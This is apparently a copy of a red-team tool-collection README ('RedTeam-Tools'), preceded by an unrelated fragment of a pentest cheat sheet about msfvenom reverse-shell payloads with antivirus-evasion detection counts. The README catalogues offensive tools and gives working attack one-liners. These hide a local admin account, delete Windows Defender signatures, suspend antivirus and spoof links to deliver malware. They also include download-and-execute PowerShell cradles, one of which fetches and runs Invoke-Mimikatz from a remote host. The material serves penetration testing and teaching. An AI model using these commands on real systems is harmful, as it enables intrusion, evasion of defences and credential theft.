msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.23 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell.exe # 27/46 wine /usr/share/windows-binaries/hyperion/hyperion.exe shell.exe crypted.exe # 14/46 # custom python reverse shell compiled to exe # 2/46 # custom C reverse shellcode compiled to exe # 1/46 ``` # Forensics ```sh strings [file] grep -a '[pattern]' [file] xdd [file] binwalk -Me [file] testdisk [file] photorec [file] ```
# RedTeam-Tools <p align="center"> <img src="https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png" height="300"> </p> This github repository contains a collection of **130+** **tools** and **resources** that can be useful for **red teaming activities**. Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context. > 🔗 If you are a Blue Teamer, check out [BlueTeam-Tools](https://github.com/A-poc/BlueTeam-Tools) > **Warning** > > *The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.* > **Note** > > *Hide Tool List headings with the arrow.* > > *Click 🔙 to get back to the list.* # Tool List <details open> <summary><b>Red Team Tips</b> 17 tips</summary> <ul> <ul> <li><b><a href="#hiding-the-local-admin-account">Hiding the local admin account</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#cripple-windows-defender-by-deleting-signatures">Cripple windows defender by deleting signatures</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#enable-multiple-rdp-sessions-per-user">Enable multiple RDP sessions per user</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#sysinternals-psexecexe-local-alternative">Sysinternals PsExec.exe local alternative</a></b><i> @GuhnooPlusLinux</i></li> <li><b><a href="#live-off-the-land-port-scanner">Live off the land port scanner</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#proxy-aware-powershell-downloadstring">Proxy aware PowerShell DownloadString</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#looking-for-internal-endpoints-in-browser-bookmarks">Looking for internal endpoints in browser bookmarks</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#query-dns-records-for-enumeration">Query DNS records for enumeration</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#unquoted-service-paths-without-powerup">Unquoted service paths without PowerUp</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#bypass-a-disabled-command-prompt-with-k">Bypass a disabled command prompt with /k</a></b><i> Martin Sohn Christensen</i></li> <li><b><a href="#stop-windows-defender-deleting-mimikatzexe">Stop windows defender deleting mimikatz.exe</a></b><i> @GuhnooPlusLinux</i></li> <li><b><a href="#check-if-you-are-in-a-virtual-machine">Check if you are in a virtual machine</a></b><i> @dmcxblue</i></li> <li><b><a href="#enumerate-applocker-rules">Enumerate AppLocker rules</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#cmd-shortcut-with-6-pixels-via-mspaint">CMD shortcut with 6 pixels via mspaint</a></b><i> PenTestPartners</i></li> <li><b><a href="#link-spoofing-with-preventdefault-javascript-method">Link spoofing with PreventDefault JavaScript method</a></b><i> </i></li> <li><b><a href="#check-smb-firewall-rules-with-responder">Check SMB firewall rules with Responder</a></b><i> @malmoeb</i></li> <li><b><a href="#disable-av-with-sysinternals-pssuspend">Disable AV with SysInternals PsSuspend</a></b><i> @0gtweet</i></li> </ul> </ul> </details> <details open> <summary><b>Reconnaissance</b> 20 tools</summary> <ul> <ul> <li><b><a href="#crtsh---httprobe---eyewitness">crt.sh -> httprobe -> EyeWitness</a></b><i> Automated domain screenshotting</i></li> <li><b><a href="#jsendpoints">jsendpoints</a></b><i> Extract page DOM links</i></li> <li><b><a href="#nuclei">nuclei</a></b><i> Vulnerability scanner</i></li> <li><b><a href="#certsniff">certSniff</a></b><i> Certificate transparency log keyword sniffer</i></li> <li><b><a href="#gobuster">gobuster</a></b><i> Website path brute force</i></li> <li><b><a href="#feroxbuster">feroxbuster</a></b><i> Fast content discovery tool written in Rust</i></li> <li><b><a href="#cloudbrute">CloudBrute</a></b><i> Cloud infrastructure brute force</i></li> <li><b><a href="#dnsrecon">dnsrecon</a></b><i> Enumerate DNS records</i></li> <li><b><a href="#shodanio">Shodan.io</a></b><i> Public facing system knowledge base</i></li> <li><b><a href="#aort">AORT (All in One Recon Tool)</a></b><i> Subdomain enumeration</i></li> <li><b><a href="#spoofcheck">spoofcheck</a></b><i> SPF/DMARC record checker</i></li> <li><b><a href="#awsbucketdump">AWSBucketDump</a></b><i> S3 bucket enumeration</i></li> <li><b><a href="#githarvester">GitHarvester</a></b><i> GitHub credential searcher</i></li> <li><b><a href="#trufflehog">truffleHog</a></b><i> GitHub credential scanner</i></li> <li><b><a href="#dismap">Dismap</a></b><i> Asset discovery/identification</i></li> <li><b><a href="#enum4linux">enum4linux</a></b><i> Windows/samba enumeration</i></li> <li><b><a href="#skanuvaty">skanuvaty</a></b><i> Dangerously fast dns/network/port scanner</i></li> <li><b><a href="#metabigor">Metabigor</a></b><i> OSINT tool without API</i></li> <li><b><a href="#gitrob">Gitrob</a></b><i> GitHub sensitive information scanner</i></li> <li><b><a href="#gowitness">gowitness</a></b><i> Web screenshot utility using Chrome Headless</i></li> </ul> </ul> </details> <details open> <summary><b>Resource Development</b> 11 tools</summary> <ul> <ul> <li><b><a href="#chimera">Chimera</a></b><i> PowerShell obfuscation</i></li> <li><b><a href="#msfvenom">msfvenom</a></b><i> Payload creation</i></li> <li><b><a href="#shellter">Shellter</a></b><i> Dynamic shellcode injection tool</i></li> <li><b><a href="#freeze">Freeze</a></b><i> Payload creation (circumventing EDR)</i></li> <li><b><a href="#wordsteal">WordSteal</a></b><i> Steal NTML hashes with Microsoft Word</i></li> <li><b><a href="#ntapi-undocumented-functions">NTAPI Undocumented Functions</a></b><i> Windows NT Kernel, Native API and drivers</i></li> <li><b><a href="#kernel-callback-functions">Kernel Callback Functions</a></b><i> Undocumented Windows APIs</i></li> <li><b><a href="#offensivevba">OffensiveVBA</a></b><i> Office macro code execution and evasion techniques</i></li> <li><b><a href="#wsh">WSH</a></b><i> Wsh payload</i></li> <li><b><a href="#hta">HTA</a></b><i> Hta payload</i></li> <li><b><a href="#vba">VBA</a></b><i> Vba payload</i></li> </ul> </ul> </details> <details open> <summary><b>Initial Access</b> 6 tools</summary> <ul> <ul> <li><b><a href="#bash-bunny">Bash Bunny</a></b><i> USB attack tool</i></li> <li><b><a href="#evilgophish">EvilGoPhish</a></b><i> Phishing campaign framework</i></li> <li><b><a href="#social-engineer-toolkit-set">The Social-Engineer Toolkit</a></b><i> Phishing campaign framework</i></li> <li><b><a href="#hydra">Hydra</a></b><i> Brute force tool</i></li> <li><b><a href="#squarephish">SquarePhish</a></b><i> OAuth/QR code phishing framework</i></li> <li><b><a href="#king-phisher">King Phisher</a></b><i> Phishing campaign framework</i></li> </ul> </ul> </details> <details open> <summary><b>Execution</b> 13 tools</summary> <ul> <ul> <li><b><a href="#responder">Responder</a></b><i> LLMNR, NBT-NS and MDNS poisoner</i></li> <li><b><a href="#secretsdump">secretsdump</a></b><i> Remote hash dumper</i></li> <li><b><a href="#evil-winrm">evil-winrm</a></b><i> WinRM shell</i></li> <li><b><a href="#donut">Donut</a></b><i> In-memory .NET execution</i></li> <li><b><a href="#macro_pack">Macro_pack</a></b><i> Macro obfuscation</i></li> <li><b><a href="#powersploit">PowerSploit</a></b><i> PowerShell script suite</i></li> <li><b><a href="#rubeus">Rubeus</a></b><i> Active directory hack tool</i></li> <li><b><a href="#sharpup">SharpUp</a></b><i> Windows vulnerability identifier</i></li> <li><b><a href="#sqlrecon">SQLRecon</a></b><i> Offensive MS-SQL toolkit</i></li> <li><b><a href="#ultimateapplockerbypasslist">UltimateAppLockerByPassList</a></b><i> Common AppLocker Bypass Techniques</i></li> <li><b><a href="#starfighters">StarFighters</a></b><i> JavaScript and VBScript Based Empire Launcher</i></li> <li><b><a href="#demiguise">demiguise</a></b><i> HTA encryption tool</i></li> <li><b><a href="#powerzure">PowerZure</a></b><i> PowerShell framework to assess Azure security</i></li> </ul> </ul> </details> <details open> <summary><b>Persistence</b> 4 tools</summary> <ul> <ul> <li><b><a href="#impacket">Impacket</a></b><i> Python script suite</i></li> <li><b><a href="#empire">Empire</a></b><i> Post-exploitation framework</i></li> <li><b><a href="#sharpersist">SharPersist</a></b><i> Windows persistence toolkit</i></li> <li><b><a href="#ligolo-ng">ligolo-ng</a></b><i> Tunneling tool that uses a TUN interface</i></li> </ul> </ul> </details> <details open> <summary><b>Privilege Escalation</b> 10 tools</summary> <ul> <ul> <li><b><a href="#linpeas">LinPEAS</a></b><i> Linux privilege escalation</i></li> <li><b><a href="#winpeas">WinPEAS</a></b><i> Windows privilege escalation</i></li> <li><b><a href="#linux-smart-enumeration">linux-smart-enumeration</a></b><i> Linux privilege escalation</i></li> <li><b><a href="#certify">Certify</a></b><i> Active directory privilege escalation</i></li> <li><b><a href="#get-gpppassword">Get-GPPPassword</a></b><i> Windows password extraction</i></li> <li><b><a href="#sherlock">Sherlock</a></b><i> PowerShell privilege escalation tool</i></li> <li><b><a href="#watson">Watson</a></b><i> Windows privilege escalation tool</i></li> <li><b><a href="#impulsivedllhijack">ImpulsiveDLLHijack</a></b><i> DLL Hijack tool</i></li> <li><b><a href="#adfsdump">ADFSDump</a></b><i> AD FS dump tool</i></li> <li><b><a href="#beroot">BeRoot</a></b><i> Multi OS Privilege Escalation Project</i></li> </ul> </ul> </details> <details open> <summary><b>Defense Evasion</b> 8 tools</summary> <ul> <ul> <li><b><a href="#invoke-obfuscation">Invoke-Obfuscation</a></b><i> Script obfuscator</i></li> <li><b><a href="#veil">Veil</a></b><i> Metasploit payload obfuscator</i></li> <li><b><a href="#sharpblock">SharpBlock</a></b><i> EDR bypass via entry point execution prevention</i></li> <li><b><a href="#alcatraz">Alcatraz</a></b><i> GUI x64 binary obfuscator</i></li> <li><b><a href="#mangle">Mangle</a></b><i> Compiled executable manipulation</i></li> <li><b><a href="#amsi-fail">AMSI Fail</a></b><i> PowerShell snippets that break or disable AMSI</i></li> <li><b><a href="#scarecrow">ScareCrow</a></b><i> Payload creation framework designed around EDR bypass</i></li> <li><b><a href="#moonwalk">moonwalk</a></b><i> Linux system log and filesystem timestamp remover</i></li> </ul> </ul> </details> <details open> <summary><b>Credential Access</b> 11 tools</summary> <ul> <ul> <li><b><a href="#mimikatz">Mimikatz</a></b><i> Windows credential extractor</i></li> <li><b><a href="#lazagne">LaZagne</a></b><i> Local password extractor</i></li> <li><b><a href="#hashcat">hashcat</a></b><i> Password hash cracking</i></li> <li><b><a href="#john-the-ripper">John the Ripper</a></b><i> Password hash cracking</i></li> <li><b><a href="#scomdecrypt">SCOMDecrypt</a></b><i> SCOM Credential Decryption Tool</i></li> <li><b><a href="#nanodump">nanodump</a></b><i> LSASS process minidump creation</i></li> <li><b><a href="#eviltree">eviltree</a></b><i> Tree remake for credential discovery</i></li> <li><b><a href="#seeyoucm-thief">SeeYouCM-Thief</a></b><i> Cisco phone systems configuration file parsing</i></li> <li><b><a href="#mailsniper">MailSniper</a></b><i> Microsoft Exchange Mail Searcher</i></li> <li><b><a href="#sharpchromium">SharpChromium</a></b><i> Cookie, history and saved login chromium extractor</i></li> <li><b><a href="#dploot">dploot</a></b><i> DPAPI looting remotely in Python</i></li> </ul> </ul> </details> <details open> <summary><b>Discovery</b> 6 tools</summary> <ul> <ul> <li><b><a href="#pcredz">PCredz</a></b><i> Credential discovery PCAP/live interface</i></li> <li><b><a href="#pingcastle">PingCastle</a></b><i> Active directory assessor</i></li> <li><b><a href="#seatbelt">Seatbelt</a></b><i> Local vulnerability scanner</i></li> <li><b><a href="#adrecon">ADRecon</a></b><i> Active directory recon</i></li> <li><b><a href="#adidnsdump">adidnsdump</a></b><i> Active Directory Integrated DNS dumping</i></li> <li><b><a href="#scavenger">scavenger</a></b><i> Scanning tool for scavenging systems</i></li> </ul> </ul> </details> <details open> <summary><b>Lateral Movement</b> 12 tools</summary> <ul> <ul> <li><b><a href="#crackmapexec">crackmapexec</a></b><i> Windows/Active directory lateral movement toolkit</i></li> <li><b><a href="#wmiops">WMIOps</a></b><i> WMI remote commands</i></li> <li><b><a href="#powerlessshell">PowerLessShell</a></b><i> Remote PowerShell without PowerShell</i></li> <li><b><a href="#psexec">PsExec</a></b><i> Light-weight telnet-replacement</i></li> <li><b><a href="#liquidsnake">LiquidSnake</a></b><i> Fileless lateral movement</i></li> <li><b><a href="#enabling-rdp">Enabling RDP</a></b><i> Windows RDP enable command</i></li> <li><b><a href="#upgrading-shell-to-meterpreter">Upgrading shell to meterpreter</a></b><i> Reverse shell improvement</i></li> <li><b><a href="#forwarding-ports">Forwarding Ports</a></b><i> Local port forward command</i></li> <li><b><a href="#jenkins-reverse-shell">Jenkins reverse shell</a></b><i> Jenkins shell command</i></li> <li><b><a href="#adfspoof">ADFSpoof</a></b><i> Forge AD FS security tokens</i></li> <li><b><a href="#kerbrute">kerbrute</a></b><i> A tool to perform Kerberos pre-auth bruteforcing</i></li> <li><b><a href="#coercer">Coercer</a></b><i> Coerce a Windows server to authenticate</i></li> <li><b><a href="#wmiops">WMIOps</a></b><i> WMI remote commands</i></li> </ul> </ul> </details> <details open> <summary><b>Collection</b> 3 tools</summary> <ul> <ul> <li><b><a href="#bloodhound">BloodHound</a></b><i> Active directory visualisation</i></li> <li><b><a href="#snaffler">Snaffler</a></b><i> Active directory credential collector</i></li> <li><b><a href="#linwinpwn">linWinPwn</a></b><i> Active Directory Enumeration and Vulnerability checks</i></li> </ul> </ul> </details> <details open> <summary><b>Command and Control</b> 9 tools</summary> <ul> <ul> <li><b><a href="#living-off-trusted-sites-project">Living Off Trusted Sites Project</a></b><i> Leverage legitimate domains for your C2</i></li> <li><b><a href="#havoc">Havoc</a></b><i> Command and control framework</i></li> <li><b><a href="#covenant">Covenant</a></b><i> Command and control framework (.NET)</i></li> <li><b><a href="#merlin">Merlin</a></b><i> Command and control framework (Golang)</i></li> <li><b><a href="#metasploit-framework">Metasploit Framework</a></b><i> Command and control framework (Ruby)</i></li> <li><b><a href="#pupy">Pupy</a></b><i> Command and control framework (Python)</i></li> <li><b><a href="#brute-ratel">Brute Ratel</a></b><i> Command and control framework ($$$)</i></li> <li><b><a href="#nimplant">NimPlant</a></b><i> C2 implant written in Nim</i></li> <li><b><a href="#hoaxshell">Hoaxshell</a></b><i> PowerShell reverse shell</i></li> </ul> </ul> </details> <details open> <summary><b>Exfiltration</b> 5 tools</summary> <ul> <ul> <li><b><a href="#dnscat2">Dnscat2</a></b><i> C2 via DNS tunneling</i></li> <li><b><a href="#cloakify">Cloakify</a></b><i> Data transformation for exfiltration</i></li> <li><b><a href="#pyexfil">PyExfil</a></b><i> Data exfiltration PoC</i></li> <li><b><a href="#powershell-rat">Powershell RAT</a></b><i> Python based backdoor</i></li> <li><b><a href="#gd-thief">GD-Thief</a></b><i> Google drive exfiltration</i></li> </ul> </ul> </details> <details open> <summary><b>Impact</b> 4 tools</summary> <ul> <ul> <li><b><a href="#conti-pentester-guide-leak">Conti Pentester Guide Leak</a></b><i> Conti ransomware group affilate toolkit</i></li> <li><b><a href="#slowloris">SlowLoris</a></b><i> Simple denial of service</i></li> <li><b><a href="#usbkill">usbkill</a></b><i> Anti-forensic kill-switch</i></li> <li><b><a href="#keytap">Keytap</a></b><i> Get pressed keyboard keys from typing audio</i></li> </ul> </ul> </details> Red Team Tips ==================== *Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.* **Note:** *Nearly all tips are currently from [@Alh4zr3d](https://twitter.com/Alh4zr3d), he posts good Red Team Tips!* ### [🔙](#tool-list)Hiding the local admin account ```bash reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f ``` **Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728) ### [🔙](#tool-list)Cripple windows defender by deleting signatures ```bash "%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All ``` **Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1611005101262389250) ### [🔙](#tool-list)Enable multiple RDP sessions per user ```bash reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f ``` **Description:** *'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016) ### [🔙](#tool-list)Sysinternals PsExec.exe local alternative ```bash wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command " ``` **Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'* **Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux) **Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1607473627922063360) ### [🔙](#tool-list)Live off the land port scanner ```bash 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null ``` **Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096) ### [🔙](#tool-list)Proxy aware PowerShell DownloadString ```bash $w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>") ``` **Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1596192664398966785) ### [🔙](#tool-list)Looking for internal endpoints in browser bookmarks ```bash type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type" ``` **Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200) ### [🔙](#tool-list)Query DNS records for enumeration ```bash Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname> ``` **Description:** *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1587132627823181824) ### [🔙](#tool-list)Unquoted service paths without PowerUp ```bash Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name ``` **Description:** *'Finding unquoted service paths without PowerUp'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064) ### [🔙](#tool-list)Bypass a disabled command prompt with /k ```bash # Win+R (To bring up Run Box) cmd.exe /k "whoami" ``` **Description:** *'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.* **Credit:** Martin Sohn Christensen **Link:** [Blog](https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you) ### [🔙](#tool-list)Stop windows defender deleting mimikatz.exe ```bash (new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv ``` **Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'* **Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux) **Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216) ### [🔙](#tool-list)Check if you are in a virtual machine ```bash reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare" ``` **Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'* **Credit:** [@dmcxblue](https://twitter.com/dmcxblue) **Link:** [Twitter](https://twitter.com/dmcxblue/status/1366779034672136194) ### [🔙](#tool-list)Enumerate AppLocker rules ``` (Get-AppLockerPolicy -Local).RuleCollections Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\ ``` **Description:** *'AppLocker can be a pain. Enumerate to see how painful'* **Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d) **Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624) ### [🔙](#tool-list)CMD shortcut with 6 pixels via mspaint ![image](https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png) 1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels 2. Zoom in to make the following tasks easier 3. Using the colour picker, set pixels values to (from left to right): - 1st: R: 10, G: 0, B: 0 - 2nd: R: 13, G: 10, B: 13 - 3rd: R: 100, G: 109, B: 99 - 4th: R: 120, G: 101, B: 46 - 5th: R: 0, G: 0, B: 101 - 6th: R: 0, G: 0, B: 0 4. Save it as 24-bit Bitmap (*.bmp;*.dib) 5. Change its extension from bmp to bat and run. **Description:** *'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'* **Credit:** [PenTestPartners](https://www.pentestpartners.com/) **Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell) ### [🔙](#tool-list)Link spoofing with PreventDefault JavaScript method ![image](https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png) ```html <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>PreventDefault Example</title> </head> <body> <a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a> </body> </html> ``` **Description:** *Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link `google.com`, but once clicked the victim will be redirected to your malicious link `bing.com`. Great for getting victims to download payloads via a controlled site.* **Link:** [PreventDefault Docs](https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault) ### [🔙](#tool-list)Check SMB firewall rules with Responder ![image](https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png) ```powershell Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$" ``` **Description:** *'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: `Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"`. If Responder could capture the hash, the firewall allows outgoing SMB connections'* **Credit:** [@malmoeb](https://twitter.com/malmoeb) **Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433) ### [🔙](#tool-list)Disable AV with SysInternals PsSuspend ![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/4519f5ad-c177-4550-b9af-238fa73ad66e) **Description:** *Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.* **Related Blog Post:** [Bypassing AV via Process Suspension with PsSuspend.exe](https://apoc.work/2023/03/22/av-bypass-with-process-suspension) **Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046) Reconnaissance ==================== ### [🔙](#tool-list)crt.sh -> httprobe -> EyeWitness I have put together a bash one-liner that: - Passively collects a list of subdomains from certificate associations ([crt.sh](https://crt.sh/)) - Actively requests each subdomain to verify it's existence ([httprobe](https://github.com/tomnomnom/httprobe)) - Actively screenshots each subdomain for manual review ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness)) **Usage:** ```bash domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web ``` *Note: You must have [httprobe](https://github.com/tomnomnom/httprobe), [pup](https://github.com/EricChiang/pup) and [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains* ![image](https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png) ![image](https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png) ### [🔙](#tool-list)[jsendpoints](https://twitter.com/renniepak/status/1602620834463588352) A JavaScript bookmarklet for extracting all webpage endpoint links on a page. Created by [@renniepak](https://twitter.com/renniepak), this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage. ```javascript javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})(); ``` **Usage (Bookmarklet)** Create a bookmarklet... - `Right click your bookmark bar` - `Click 'Add Page'` - `Paste the above Javascript in the 'url' box` - `Click 'Save'` ...then visit the victim page in the browser and click the bookmarklet. ![image](https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png) **Usage (Console)** Paste the above Javascript into the console window `F12` and press enter. ![image](https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png) ### [🔙](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei) Fast vulnerability scanner that uses .yaml templates to search for specific issues. **Install:** ```bash go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest ``` **Usage:** ```bash cat domains.txt | nuclei -t /PATH/nuclei-templates/ ``` ![image](https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png) ### [🔙](#tool-list)[certSniff](https://github.com/A-poc/certSniff) certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file. You can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of. **Install:** ```bash git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt ``` **Usage:** ```python python3 certSniff.py -f example.txt ``` ![image](https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png) ### [🔙](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/) Nice tool for brute forcing file/folder paths on a victim website. **Install:** ```bash sudo apt install gobuster ``` **Usage:** ```bash gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20 ``` ![image](https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png) ### [🔙](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster) A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker. Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc... **Install: (Kali)** ```bash sudo apt update && sudo apt install -y feroxbuster ``` **Install: (Mac)** ```bash curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash ``` **Install: (Windows)** ```bash Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V ``` For full installation instructions see [here](https://epi052.github.io/feroxbuster-docs/docs/installation/). **Usage:** ```bash # Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # Scan with headers ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # Read URLs from stdin cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # Proxy requests through burpsuite ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080 ``` Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/). 